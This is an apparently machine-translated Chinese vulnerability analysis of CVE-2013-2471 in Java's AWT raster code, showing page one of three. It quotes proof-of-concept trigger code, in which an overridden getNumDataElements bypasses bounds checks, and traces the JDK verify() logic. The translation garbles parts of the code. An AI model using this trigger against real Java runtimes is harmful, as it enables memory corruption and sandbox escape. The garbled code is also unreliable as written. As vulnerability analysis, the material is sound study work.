CVE-2 0 1 3-2 4 7 1 vulnerability analysis-vulnerability warning-the black bar safety net

2013-08-21T00:00:00
ID MYHACK58:62201340220
Type myhack58
Reporter 佚名
Modified 2013-08-21T00:00:00

Description

1, Introduction

There is no exposed java vulnerability, a simple analysis of the recent CVE-2 0 1 3-2 4 7 1, learn java vulnerabilities associated principle. POC from http://packetstormsecurity. com/files/1 2 2 8 0 6/in.

ps: thanks to the oo help.

2, the vulnerability causes

Trigger the vulnerability in the code:

// code in MyJApplet.java DataBufferInt dst = new DataBufferInt(new int[4], 4, 1 4 + (_is64 ? 4:0)); int[] a = new int[1 6]; DataBufferInt src = new DataBufferInt(2); src. setElem(1,-1); DirectColorModel cm = (DirectColorModel)ColorModel. getRGBdefault(); SinglePixelPackedSampleModel sm1 = new SinglePixelPackedSampleModel(DataBuffer. TYPE_INT, 1,2,1, cm. getMasks()); WritableRaster wr1 = Raster. createWritableRaster(sm1, src, null); MySampleModel sm2 = new MySampleModel(DataBuffer. TYPE_INT, 1,2, _is7u17 ? 1 : 0x80000001, cm. getMasks()); WritableRaster wr2 = Raster. createWritableRaster(sm2, dst, null); CompositeContext cc = java. awt. The AlphaComposite. Src. the createContext(cm, cm, null); cc. compose(wr1, wr2, wr2);

the poc code first construct a malicious DataBufferInt dst, buffer length is 4 int, but specified a 1 4 of the initialized offset, the offset will be in a write operation for validity verification.

To bypass validation, poc defines a malicious class MySampleModel, reload the SinglePixelPackedSampleModel class getNumDataElements method, it returns 0. With the original method of comparison:

class MySampleModel extends SinglePixelPackedSampleModel { public int getNumDataElements() { return 0; } } public class SinglePixelPackedSampleModel extends SampleModel { public int getNumDataElements() { return 1; } }

When calling the Raster. createWritableRaster create a WritableRaster wr2:

public static WritableRaster createWritableRaster(SampleModel sm, DataBuffer db, Point location) { ... case DataBuffer. TYPE_INT: return new IntegerInterleavedRaster(sm, db, location); ... }

The final call IntegerInterleavedRaster construction method to construct a malicious WritableRaster: the

public IntegerInterleavedRaster(SampleModel sampleModel, DataBuffer dataBuffer, Rectangle aRegion, Point origin, IntegerInterleavedRaster parent){ super(sampleModel,dataBuffer,aRegion,origin,parent); this. maxX = minX + width; this. maxY = minY + height; if (! (dataBuffer instanceof DataBufferInt)) { throw new RasterFormatException("IntegerInterleavedRasters must have" + "integer DataBuffers"); } DataBufferInt dbi = (DataBufferInt)dataBuffer; this. data = stealData(dbi, 0);

if (sampleModel instanceof SinglePixelPackedSampleModel) { SinglePixelPackedSampleModel sppsm = (SinglePixelPackedSampleModel)sampleModel; this. scanlineStride = sppsm. getScanlineStride(); this. pixelStride = 1; this. dataOffsets = new int[1]; this. dataOffsets[0] = dbi. getOffset(); this. bandOffset = this. dataOffsets[0]; int xOffset = aRegion. x - origin. x; int yOffset = aRegion. the y - origin. y; dataOffsets[0] += xOffset+yOffset*scanlineStride; this. numDataElems = sppsm. getNumDataElements(); } else { throw new RasterFormatException("IntegerInterleavedRasters must have"+ "SinglePixelPackedSampleModel"); } verify(); }

Which of this. numDataElems = sppsm. getNumDataElements();because the method is overloaded, numDataElems is initialized to 0, after calling verify()to check the validity of the method in the parent class IntegerComponentRaster in the implementation:

protected final void verify() { ... int maxSize = 0; int size; ... / numDataElements is initialized to 0, bypassing the here to verify / for (int i = 0; i < num DataElements; i++) { if (dataOffsets[i] > (Integer. MAX_VALUE - lastPixelOffset)) { throw new RasterFormatException("Incorrect band offset: " + dataOffsets[i]); }

size = lastPixelOffset + dataOffsets[i];

if (size > maxSize) { maxSize = size; } } / Since the bypass dataOffsets[i]verify that the maxSize constant equal to 0, the data. length is considered to be legitimate / if (data. length < maxSize) { throw new RasterFormatException("Data array too small (should be " + maxSize + " )"); } }

[1] [2] [3] next